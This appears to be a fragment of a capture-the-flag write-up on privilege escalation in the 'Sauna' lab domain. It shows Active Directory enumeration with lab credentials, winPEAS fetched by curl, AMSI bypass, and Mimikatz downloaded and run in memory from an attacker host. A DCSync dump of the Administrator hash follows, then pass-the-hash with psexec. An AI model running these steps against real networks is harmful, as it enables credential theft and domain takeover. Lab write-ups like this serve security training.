Priv Esc
sudo bloodhound-python -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' -ns 10.10.10.175 -c all
Last updated
sudo bloodhound-python -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' -ns 10.10.10.175 -c allLast updated
SVC_LOANMGR*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/winPEAS.exe -o winPEAS.exe
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 1/22/2020 9:30 PM Microsoft
d----- 7/13/2021 10:53 AM Package Cache
d----- 5/28/2024 4:43 PM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 1/22/2020 9:33 PM USOPrivate
d----- 1/22/2020 9:33 PM USOShared
d----- 7/13/2021 10:54 AM VMware
-a---- 5/28/2024 5:24 PM 2387456 winPEAS.exe
*Evil-WinRM* PS C:\programdata> .\winPEAS.exe
svc_loanmgr:Moneymakestheworldgoround!$ netexec winrm sauna -u svc_loanmgr -p 'Moneymakestheworldgoround!'$ evil-winrm -i sauna -u svc_loanmgr -p 'Moneymakestheworldgoround!' -s ~/opt/wpe*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Bypass-4MSI
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator"'impacket-psexec administrator@sauna -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'